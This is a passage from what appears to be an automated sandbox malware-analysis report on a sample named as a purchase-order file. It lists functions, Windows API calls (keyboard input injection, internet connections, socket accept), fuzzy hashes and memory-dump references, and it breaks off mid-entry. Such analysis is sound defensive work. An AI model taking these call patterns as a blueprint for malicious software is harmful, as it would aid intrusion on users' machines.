                                                                                                              • API ID: Variant$AllocClearCopyInitString
                                                                                                              • String ID:
                                                                                                              • API String ID: 2808897238-0
                                                                                                              • Opcode ID: 32dbe11a230fc354ce4a016cc477d321a909192e63c8c44fe4f52a7f11a8f078
                                                                                                              • Instruction ID: d86f99315ba76b6359f35c0d19c543e5062f5517383b1006531f0881b77f0824
                                                                                                              • Opcode Fuzzy Hash: 32dbe11a230fc354ce4a016cc477d321a909192e63c8c44fe4f52a7f11a8f078
                                                                                                              • Instruction Fuzzy Hash: 32519D30B0430A9BDB249F76D4A56AEB3D5EF48314F20881FE956CB2D1DB789CC1971A
                                                                                                              Function 0040365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                              • String ID:
                                                                                                              • API String ID: 3877424927-0
                                                                                                              • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                                              • Instruction ID: 7b410fc20a38ee1ec6dcc426ce1b48b3c5e34efb37b4956d31b244641bb616b4
                                                                                                              • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                                              • Instruction Fuzzy Hash: 8F51F7B0A00305ABDB249F69888456F7FA9AF40325F20873FF825A73D0D7799F518B59
                                                                                                              Function 0042C396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 003E4517: _fseek.LIBCMT ref: 003E452F
                                                                                                                • Part of subcall function 0042C56D: _wcscmp.LIBCMT ref: 0042C65D
                                                                                                                • Part of subcall function 0042C56D: _wcscmp.LIBCMT ref: 0042C670
                                                                                                              • _free.LIBCMT ref: 0042C4DD
                                                                                                              • _free.LIBCMT ref: 0042C4E4
                                                                                                              • _free.LIBCMT ref: 0042C54F
                                                                                                                • Part of subcall function 00401C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00407A85), ref: 00401CB1
                                                                                                                • Part of subcall function 00401C9D: GetLastError.KERNEL32(00000000,?,00407A85), ref: 00401CC3
                                                                                                              • _free.LIBCMT ref: 0042C557
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                              • String ID:
                                                                                                              • API String ID: 1552873950-0
                                                                                                              • Opcode ID: 175c17775220f26e0e0cd87b3ee38f03475ae72a0804ab278d6a86c3e5061848
                                                                                                              • Instruction ID: 38b2bae76b9f55905521d2e60268c3a67dbb59d3b16dbd644b5678e7ee5a88df
                                                                                                              • Opcode Fuzzy Hash: 175c17775220f26e0e0cd87b3ee38f03475ae72a0804ab278d6a86c3e5061848
                                                                                                              • Instruction Fuzzy Hash: F75175B1A04228AFDF159F55DC81BADBBB9EF48304F1000AEF219B7291DB755A80CF59
                                                                                                              Function 0044C4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetWindowRect.USER32(00D578E0,?), ref: 0044C544
                                                                                                              • ScreenToClient.USER32(?,00000002), ref: 0044C574
                                                                                                              • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0044C5DA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$ClientMoveRectScreen
                                                                                                              • String ID:
                                                                                                              • API String ID: 3880355969-0
                                                                                                              • Opcode ID: 7d9ffb65b33ce156c8f6b5d74ddb4ffaeb9b2aad501c8e8749395f179724ee44
                                                                                                              • Instruction ID: cf47c36100eb6be7bea21f4e5ea5175a854b0331794e8d438c5713073a9af294
                                                                                                              • Opcode Fuzzy Hash: 7d9ffb65b33ce156c8f6b5d74ddb4ffaeb9b2aad501c8e8749395f179724ee44
                                                                                                              • Instruction Fuzzy Hash: 61516C75A01204EFDF20DF68C8C0AAE7BB5EB55360F14826AF915DB2A0D774ED41CB98
                                                                                                              Function 0041C410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0041C462
                                                                                                              • __itow.LIBCMT ref: 0041C49C
                                                                                                                • Part of subcall function 0041C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0041C753
                                                                                                              • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0041C505
                                                                                                              • __itow.LIBCMT ref: 0041C55A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$__itow
                                                                                                              • String ID:
                                                                                                              • API String ID: 3379773720-0
                                                                                                              • Opcode ID: 90004d68fdd628e54142db3953c670130aba3c90fdab0286c42a0695965c9af3
                                                                                                              • Instruction ID: f85c9c505552c04053ad8b2132f86c1676a1b7818877f358453c7eb5ecbeb4bc
                                                                                                              • Opcode Fuzzy Hash: 90004d68fdd628e54142db3953c670130aba3c90fdab0286c42a0695965c9af3
                                                                                                              • Instruction Fuzzy Hash: DB41E971A40258BFDF11DF55CC91BEE7BB5AF48704F00002AF605A72C1DB789A85CB95
                                                                                                              Function 0042390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00423966
                                                                                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 00423982
                                                                                                              • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 004239EF
                                                                                                              • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00423A4D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 432972143-0
                                                                                                              • Opcode ID: e5ecebe78486b512da76763242adbcaa214f44a4f3e32167055c43a5069f5911
                                                                                                              • Instruction ID: f0268c0be54ac6712ae1348f1da212f5d0b553ea26f1d2acddcbf72031cf95fd
                                                                                                              • Opcode Fuzzy Hash: e5ecebe78486b512da76763242adbcaa214f44a4f3e32167055c43a5069f5911
                                                                                                              • Instruction Fuzzy Hash: 4C41E5B0F042286AEF208F65A8057FABBB59B56312F84015BE4C1922C1C7FD9A85D76D
                                                                                                              Function 0042E698 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0042E742
                                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 0042E768
                                                                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0042E78D
                                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0042E7B9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 3321077145-0
                                                                                                              • Opcode ID: 8216aea218aed24c9fa818bbcd590d231a3490d6df5dd2bed04fa97f245318ae
                                                                                                              • Instruction ID: 2f19471a203f10c910c014283651111ffb07bd4b1321d6c6966220435cc670c7
                                                                                                              • Opcode Fuzzy Hash: 8216aea218aed24c9fa818bbcd590d231a3490d6df5dd2bed04fa97f245318ae
                                                                                                              • Instruction Fuzzy Hash: FF413839700664DFCB12EF16C544A5DBBE5BF99710B09849AE906AF3A2CB74FC00CB95
                                                                                                              Function 0044B544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0044B5D1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InvalidateRect
                                                                                                              • String ID:
                                                                                                              • API String ID: 634782764-0
                                                                                                              • Opcode ID: d5c3a11c27cdd869e635596e948e345b341c63bec8ac54e613ce5a6db61c8868
                                                                                                              • Instruction ID: 28f9aed23d234a6f18489d06e488eceeb8008acd942c21c63b22dcc4585595a0
                                                                                                              • Opcode Fuzzy Hash: d5c3a11c27cdd869e635596e948e345b341c63bec8ac54e613ce5a6db61c8868
                                                                                                              • Instruction Fuzzy Hash: 4331FE34A00208BBFB209F18CC85FAAB764EB06354F548113FA11D62E1C738E9409BDF
                                                                                                              Function 0044D7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ClientToScreen.USER32(?,?), ref: 0044D807
                                                                                                              • GetWindowRect.USER32(?,?), ref: 0044D87D
                                                                                                              • PtInRect.USER32(?,?,0044ED5A), ref: 0044D88D
                                                                                                              • MessageBeep.USER32(00000000), ref: 0044D8FE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 1352109105-0
                                                                                                              • Opcode ID: dd05d1142cbe59590cc96fe4768aa73274b4d7a5c3caa1d66e96702d99b86351
                                                                                                              • Instruction ID: aba48309caff49f50a636949ff860643d81ad86d4b87c61b50f177dbf3ac989e
                                                                                                              • Opcode Fuzzy Hash: dd05d1142cbe59590cc96fe4768aa73274b4d7a5c3caa1d66e96702d99b86351
                                                                                                              • Instruction Fuzzy Hash: 83419A70E00218DFEB11EF59C884BAA7BB5FF4A750F1881AAE425CB360D334E945CB49
                                                                                                              Function 00423A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00423AB8
                                                                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00423AD4
                                                                                                              • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00423B34
                                                                                                              • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00423B92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 432972143-0
                                                                                                              • Opcode ID: 19a3a3ced840faa7f0c36d8a9382fa7d46123d112165f688658aecfb2b90e380
                                                                                                              • Instruction ID: cfd0d54b22715d5457a9c14314b83c8f9217ee4b0eece548a900a66052ce41a5
                                                                                                              • Opcode Fuzzy Hash: 19a3a3ced840faa7f0c36d8a9382fa7d46123d112165f688658aecfb2b90e380
                                                                                                              • Instruction Fuzzy Hash: E3311830F00268AEEF208F64A8197BE7FB59B55316F84011BE481932D2C7BCAB45D76D
                                                                                                              Function 00414004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00414038
                                                                                                              • __isleadbyte_l.LIBCMT ref: 00414066
                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00414094
                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 004140CA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                              • String ID:
                                                                                                              • API String ID: 3058430110-0
                                                                                                              • Opcode ID: e0d1ac030a19e7f0cad452007f9048e7e9efc68f5a88ff73f0b5b92df3a7e7c6
                                                                                                              • Instruction ID: f1aea9dbfa4c874d932d12bacde0dfbb76d17635002f0ac1d5a2b05c525deece
                                                                                                              • Opcode Fuzzy Hash: e0d1ac030a19e7f0cad452007f9048e7e9efc68f5a88ff73f0b5b92df3a7e7c6
                                                                                                              • Instruction Fuzzy Hash: B631D230600206AFDB219F36C844BEB7FA5BF89310F15442AE6659B2E0E735D8D1D798
                                                                                                              Function 00447CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetForegroundWindow.USER32 ref: 00447CB9
                                                                                                                • Part of subcall function 00425F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00425F6F
                                                                                                                • Part of subcall function 00425F55: GetCurrentThreadId.KERNEL32 ref: 00425F76
                                                                                                                • Part of subcall function 00425F55: AttachThreadInput.USER32(00000000,?,0042781F), ref: 00425F7D
                                                                                                              • GetCaretPos.USER32(?), ref: 00447CCA
                                                                                                              • ClientToScreen.USER32(00000000,?), ref: 00447D03
                                                                                                              • GetForegroundWindow.USER32 ref: 00447D09
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                              • String ID:
                                                                                                              • API String ID: 2759813231-0
                                                                                                              • Opcode ID: 0b70a06dad070cbf8c76010d97e82d6e7cc42ca88b33c95f9b5a006604df063f
                                                                                                              • Instruction ID: 976edf5ad2400e42cf35b83875a125334b1376cb78e8b6fcdba456e2486f47d0
                                                                                                              • Opcode Fuzzy Hash: 0b70a06dad070cbf8c76010d97e82d6e7cc42ca88b33c95f9b5a006604df063f
                                                                                                              • Instruction Fuzzy Hash: 2C314F71E00108AFDB01EFA5DD819FFBBF9EF58314B11846AE915E7211DB349E018BA5
                                                                                                              Function 0044F1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 003FB34E: GetWindowLongW.USER32(?,000000EB), ref: 003FB35F
                                                                                                              • GetCursorPos.USER32(?), ref: 0044F211
                                                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0045E4C0,?,?,?,?,?), ref: 0044F226
                                                                                                              • GetCursorPos.USER32(?), ref: 0044F270
                                                                                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0045E4C0,?,?,?), ref: 0044F2A6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 2864067406-0
                                                                                                              • Opcode ID: 1f08e36c8ba076416d0cb18ff9a92ee87e4e0b2cabe6eacff3cda284e0e93ac3
                                                                                                              • Instruction ID: 2b7b3668d57aaa665d9b24f25cff3273790fe81b3085d93b351a96975c57ce53
                                                                                                              • Opcode Fuzzy Hash: 1f08e36c8ba076416d0cb18ff9a92ee87e4e0b2cabe6eacff3cda284e0e93ac3
                                                                                                              • Instruction Fuzzy Hash: 4E21A039A00028AFDB158F94D858EFB7BB5FF0A310F0880AAF9058B6A1D3799951DB54
                                                                                                              Function 0043431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00434358
                                                                                                                • Part of subcall function 004343E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00434401
                                                                                                                • Part of subcall function 004343E2: InternetCloseHandle.WININET(00000000), ref: 0043449E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Internet$CloseConnectHandleOpen
                                                                                                              • String ID:
                                                                                                              • API String ID: 1463438336-0
                                                                                                              • Opcode ID: a7382739c7f8fc7352bb4fca478582df1c2eda28c810910febab5c9791d9fff8
                                                                                                              • Instruction ID: 3d0147413ff9ce8360c10cac7f240bb1f90bd6dfe9830c26a4be09eadf05ab9c
                                                                                                              • Opcode Fuzzy Hash: a7382739c7f8fc7352bb4fca478582df1c2eda28c810910febab5c9791d9fff8
                                                                                                              • Instruction Fuzzy Hash: 53210431700601BBDB119F608C00FBBB7A9FF8C701F00502FFA1587650D775A8219B99
                                                                                                              Function 00438A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00438AE0
                                                                                                              • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00438AF2
                                                                                                              • accept.WSOCK32(00000000,00000000,00000000), ref: 00438AFF
                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00438B16
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLastacceptselect
                                                                                                              • String ID:
                                                                                                              • API String ID: 385091864-0
                                                                                                              • Opcode ID: 9544b8efd68151e4df971daca25dc3e78887a39212f43e465a319d8bbe6e4bf8
                                                                                                              • Instruction ID: 7583de79b351ec56b9626a2f7c1679ce84e9fb74aab3451e4c4c8e8c9fa3517f
                                                                                                              • Opcode Fuzzy Hash: 9544b8efd68151e4df971daca25dc3e78887a39212f43e465a319d8bbe6e4bf8
                                                                                                              • Instruction Fuzzy Hash: 54219372A001249FC7219F69D885A9EBBECEF49310F00416AF949D7290DB749A418F95
                                                                                                              Function 00448A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00448AA6
                                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00448AC0
                                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00448ACE
                                                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00448ADC
                                                                                                              Memory Dump Source
